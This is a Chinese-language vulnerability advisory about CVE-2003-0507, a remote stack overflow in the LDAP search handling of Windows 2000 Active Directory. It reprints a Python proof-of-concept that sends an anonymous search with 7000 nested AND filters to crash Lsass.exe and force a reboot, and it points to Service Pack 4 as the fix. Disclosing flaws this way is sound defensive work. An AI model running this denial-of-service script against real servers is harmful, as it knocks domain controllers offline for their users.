安全研究

安全漏洞
Microsoft Windows Active目录远程堆栈溢出漏洞

发布日期:2003-07-02
更新日期:2003-07-04

受影响系统:
Microsoft Active Directory
    - Microsoft Windows 2000 Server
描述:
BUGTRAQ  ID: 7930
CVE(CAN) ID: CVE-2003-0507

Windows活动目录(Active Directory)是Windows 2000结构的重要组件,是一款Microsoft公开提供的强大的目录服务系统。

Windows活动目录的LDAP 3搜索请求功能对用户提交请求缺少正确缓冲区边界检查,远程攻击者可以利用这个漏洞使Lsass.exe服务崩溃,触发缓冲区溢出。

通过活动目录提供的目录服务基于LDAP协议和并使用协议存储和获得Active目录对象。活动目录中使用LDAP 3的'search request'请求功能存在问题,攻击者如果构建超过1000个"AND"的请求,并发送给服务器,可导致触发堆栈溢出,使Lsass.exe服务崩溃,系统会在30秒内重新启动。

<*来源:CORE Security Technologies Advisories (advisories@coresecurity.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105716669921775&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

CORE Security Technologies Advisories (advisories@coresecurity.com)提供了如下测试方法:

下面是一段Python测试脚本:

------------------------------------
class ActiveDirectoryDOS( Ldap ):


     def __init__(self):
         self._s = None
         self.host = '192.168.0.1'
         self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'
         self.port = 389
         self.buffer = ''
         self.msg_id = 1
         Ldap.__init__()


     def generateFilter_BinaryOp( self, filter ):
         filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode()
         filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )
         return filterBuffer


     def generateFilter_RecursiveBinaryOp( self, filter, numTimes):
         simpleBinOp = self.generateFilter_BinaryOp( filter )
         filterBuffer = simpleBinOp
         for cnt in range( 0, numTimes ):
             filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffer + simpleBinOp )
         return filterBuffer



     def searchSub( self, filterBuffer ):


         self.bindRequest()
         self.searchRequest( filterBuffer )


     def run(self, host = '', basedn = '', name = '' ):


         # the machine must not exist
         machine_name = 'xaxax'


         filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,'name',machine_name)


         # execute the anonymous query
         print 'executing query'
         filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 )
         self.searchSub( filterBuffer )


------------------------------------

建议:
厂商补丁:

Microsoft
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

下载Windows 2000 SP4
http://www.microsoft.com/Windows2000/downloads/servicepacks/sp4/

浏览次数:3260
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障